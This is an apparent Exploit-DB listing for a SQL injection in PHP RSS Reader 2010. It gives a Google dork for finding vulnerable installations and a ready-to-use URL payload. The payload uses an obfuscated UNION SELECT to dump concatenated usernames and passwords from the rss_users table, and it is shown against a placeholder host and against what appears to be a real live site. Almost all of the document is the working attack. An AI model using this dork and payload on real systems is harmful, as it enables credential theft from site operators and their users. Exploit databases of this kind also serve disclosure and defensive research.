PHP RSS Reader 2010 - SQL Injection

EDB-ID:

29258

CVE:





Platform:

PHP

Date:

2013-10-28


# Exploit Title: [PHP RSS READER 2010 SQLI]
# Google Dork: [Copyright 2010 - Powered By - PHP RSS Reader]
# Date: [28/10/2013]
# Exploit Author: [rDNix]
# Vendor Homepage: [http://www.phprssreader.com/]
# Version: [2010]

Exploit :-

http://www.site.com/[phprssreader]/null'%20/*!uNION*/%20/*!select*/%201,2,3,/*!concat(username,password)*/,5,6,7,8,9,10,11%20from%20rss_users--+<http://www.kt.com.kw/read2/null'%20/*!uNION*/%20/*!select*/%201,2,3,/*!concat(username,password)*/,5,6,7,8,9,10,11%20from%20rss_users--+>


By : rDNix
Contact : Mynamemishal@gmail.com